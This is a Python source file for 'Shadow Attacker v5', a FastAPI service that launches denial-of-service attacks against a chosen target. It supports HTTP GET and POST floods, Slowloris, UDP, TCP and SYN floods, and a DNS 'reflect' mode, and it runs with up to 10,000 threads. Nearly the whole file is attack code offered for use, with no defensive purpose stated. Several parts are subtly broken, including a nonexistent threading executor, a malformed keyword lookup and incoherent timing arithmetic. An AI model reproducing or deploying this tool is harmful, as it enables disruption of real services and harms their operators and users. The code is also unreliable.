# ============================================================== # SHADOW ATTACKER v5 – LAYER 4 + LAYER 7 + REFLECT + SLOWLORIS # 10,000 THREADS | 10,000s MAX | FULL POWER | HF SPACES READY # ============================================================== import random import socket import threading import time import ssl import urllib.parse from collections import deque from typing import Dict, Optional, List import uvicorn import requests from fastapi import FastAPI, HTTPException from pydantic import BaseModel, conint, constr # ------------------- LOGGING & STATE ------------------- import logging logging.basicConfig(level=logging.INFO, format="%(message)s") log = logging.getLogger() app = FastAPI(title="Shadow Attacker v5") # Global state attack_active = False attack_lock = threading.Lock() executor = None # Will be initialized at startup stop_event = threading.Event() counters: Dict[str, int] = {} counters_lock = threading.Lock() total_packets = 0 log_buffer: deque[str] = deque(maxlen=500) attack_end_time = 0.0 # PPS tracking last_time = time.time() last_total = 0 def _log(msg: str): ts = time.strftime("%H:%M:%S") log.info(f"{ts} {msg}") log_buffer.append(f"{ts} {msg}") # ------------------- CONFIG MODELS ------------------- class AttackConfig(BaseModel): target: str port: conint(ge=1, le=65535) = 80 duration: conint(ge=-1, le=10000) = 300 # -1 = unlimited threads: conint(ge=-1, le=10000) = 1000 # -1 = unlimited class Layer7Config(AttackConfig): method: constr(regex='^(get|post|slowloris|reflect)$') = "get" class Layer4Config(AttackConfig): protocol: constr(regex='^(tcp|udp|syn)$') = "udp" payload_size: conint(ge=1, le=65507) = 1024 # ------------------- STATUS MODEL ------------------- class StatusResponse(BaseModel): running: bool attack_type: Optional[str] target: Optional[str] total_packets: int pps: float threads_active: int duration: int elapsed: float remaining: float logs: List[str] # ------------------- HIGH-PPS WORKERS ------------------- def init_executor(): global executor if executor is None: executor = threading.ThreadPoolExecutor(max_workers=10000) # --- LAYER 7: HTTP FLOOD --- def http_flood(target_url: str): global total_packets headers = { "User-Agent": random.choice([ "Mozilla/5.0", "Googlebot/2.1", "Chrome/120.0", "Safari/537.36" ]), "Cache-Control": "no-cache", "Connection": "keep-alive" } session = requests.Session() while not stop_event.is_set(): try: session.get(target_url, headers=headers, timeout=3, verify=False) with counters_lock: counters["l7"] = counters.get("l7", 0) + 1 total_packets += 1 except: pass # --- LAYER 7: POST FLOOD --- def http_post_flood(target_url: str): global total_packets data = {"data": random._urandom(512).hex()} while not stop_event.is_set(): try: requests.post(target_url, data=data, timeout=3, verify=False) with counters_lock: counters["l7"] = counters.get("l7", 0) + 1 total_packets += 1 except: pass # --- LAYER 7: SLOWLORIS --- def slowloris(target: str, port: int): global total_packets while not stop_event.is_set(): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target, port)) sock.send(b"GET / HTTP/1.1\r\n") sock.send(b"Host: %s\r\n" % target.encode()) time.sleep(5) while not stop_event.is_set(): sock.send(b"X-a: b\r\n") with counters_lock: counters["l7"] = counters.get("l7", 0) + 1 total_packets += 1 time.sleep(10) except: pass finally: try: sock.close() except: pass # --- LAYER 7: DNS REFLECT --- def dns_reflect(target_ip: str): global total_packets dns_servers = ["8.8.8.8", "1.1.1.1", "9.9.9.9"] payload = b"\x00\x01\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x03www" + random._urandom(50) while not stop_event.is_set(): try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) for server in dns_servers: sock.sendto(payload, (server, 53)) with counters_lock: counters["reflect"] = counters.get("reflect", 0) + 1 total_packets += 1 except: pass finally: try: sock.close() except: pass # --- LAYER 4: UDP FLOOD --- def udp_flood(target_ip: str, port: int, payload_size: int): global total_packets payload = random._urandom(payload_size) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) addr = (target_ip, port) try: while not stop_event.is_set(): sock.sendto(payload, addr) with counters_lock: counters["l4"] = counters.get("l4", 0) + 1 total_packets += 1 except: pass finally: sock.close() # --- LAYER 4: TCP FLOOD --- def tcp_flood(target_ip: str, port: int, payload_size: int): global total_packets payload = random._urandom(payload_size) while not stop_event.is_set(): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(1) sock.connect((target_ip, port)) while not stop_event.is_set(): sock.send(payload) with counters_lock: counters["l4"] = counters.get("l4", 0) + 1 total_packets += 1 except: pass finally: try: sock.close() except: pass # --- LAYER 4: SYN FLOOD --- def syn_flood(target_ip: str, port: int): global total_packets while not stop_event.is_set(): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(0.1) sock.connect_ex((target_ip, port)) with counters_lock: counters["l4"] = counters.get("l4", 0) + 1 total_packets += 1 except: pass finally: try: sock.close() except: pass # ------------------- ATTACK LAUNCHERS ------------------- def launch_attack(attack_type: str, target: str, port: int, threads: int, duration: int, **kwargs): global attack_active, attack_end_time, total_packets with attack_lock: if attack_active: raise HTTPException(400, "Attack already running") attack_active = True stop_event.clear() counters.clear() total_packets = 0 attack_end_time = time.time() + duration if duration > 0 else float('inf') _log(f"LAUNCHED {attack_type.upper()} → {target}:{port} | {threads} threads | {duration}s") init_executor() worker = None target_ip = target target_url = target if attack_type.startswith("http"): target_url = f"http://{target}:{port}" if attack_type == "http_get": worker = http_flood elif attack_type == "http_post": worker = http_post_flood elif attack_type == "slowloris": worker = lambda: slowloris(target, port) elif attack_type == "reflect": worker = lambda: dns_reflect(target) elif attack_type in ["udp", "tcp", "syn"]: try: target_ip = socket.gethostbyname(target.split("//")[-1].split("/")[0]) except: raise HTTPException(400, "Invalid target") payload_size = kwargs.get("payload_size, 1024") if attack_type == "udp": worker = lambda: udp_flood(target_ip, port, payload_size) elif attack_type == "tcp": worker = lambda: tcp_flood(target_ip, port, payload_size) elif attack_type == "syn": worker = lambda: syn_flood(target_ip, port) if not worker: raise HTTPException(400, "Invalid attack type") thread_count = threads if threads > 0 else 10000 for _ in range(thread_count): executor.submit(worker) # Auto-stop if duration > 0: def auto_stop(): time.sleep(duration) stop_attack() threading.Thread(target=auto_stop, daemon=True).start() # ------------------- API ENDPOINTS ------------------- @app.post("/layer7/attack") def layer7_attack(config: Layer7Config): method = config.method attack_type = { "get": "http_get", "post": "http_post", "slowloris": "slowloris", "reflect": "reflect" }[method] launch_attack(attack_type, config.target, config.port, config.threads, config.duration) return {"status": f"{method}_attack_started", "config": config} @app.post("/layer4/attack") def layer4_attack(config: Layer4Config): attack_type = config.protocol launch_attack( attack_type, config.target, config.port, config.threads, config.duration, payload_size=config.payload_size ) return {"status": f"{attack_type}_attack_started", "config": config} @app.post("/stop") def stop_attack(): global attack_active with attack_lock: if not attack_active: return {"status": "no_attack_running"} stop_event.set() attack_active = False _log("ATTACK STOPPED BY USER") return {"status": "attack_stopped"} @app.get("/status", response_model=StatusResponse) def status(): global last_time, last_total now = time.time() elapsed_global = now - last_time pps = (total_packets - last_total) / elapsed_global if elapsed_global > 0 else 0 last_time, last_total = now, total_packets active_threads = len([t for t in threading.enumerate() if t.name.startswith("Thread")]) elapsed = now - (attack_end_time - (attack_end_time - now)) if attack_active else 0 remaining = max(0, attack_end_time - now) if attack_active and attack_end_time != float('inf') else -1 return StatusResponse( running=attack_active, attack_type=list(counters.keys())[0] if counters else None, target=None, total_packets=total_packets, pps=round(pps, 1), threads_active=active_threads, duration=int(attack_end_time - (time.time() - (attack_end_time - time.time()))) if attack_active else 0, elapsed=round(elapsed, 1), remaining=round(remaining, 1) if remaining > 0 else -1, logs=list(log_buffer) ) @app.get("/") def root(): return {"message": "Shadow Attacker v5 - /docs for API"} # ------------------- STARTUP ------------------- if __name__ == "__main__": init_executor() uvicorn.run(app, host="0.0.0.0", port=8000, workers=1)